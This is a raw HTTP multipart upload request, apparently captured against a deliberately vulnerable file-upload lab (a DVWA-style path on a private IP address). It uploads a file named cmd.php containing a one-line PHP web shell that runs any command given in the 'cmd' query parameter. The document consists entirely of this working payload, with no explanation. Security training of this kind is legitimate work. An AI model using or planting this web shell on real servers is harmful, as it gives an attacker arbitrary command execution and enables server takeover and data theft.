POST /vulnerabilities/upload/ HTTP/1.1
Host: 10.10.3.128
Content-Length: 430
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.3.128
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytX7Irf8JSjp5BbhV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundarytX7Irf8JSjp5BbhV
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
------WebKitFormBoundarytX7Irf8JSjp5BbhV
Content-Disposition: form-data; name="uploaded"; filename="cmd.php"
Content-Type: application/octet-stream

<?php
system($_GET[cmd]);
------WebKitFormBoundarytX7Irf8JSjp5BbhV
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundarytX7Irf8JSjp5BbhV--
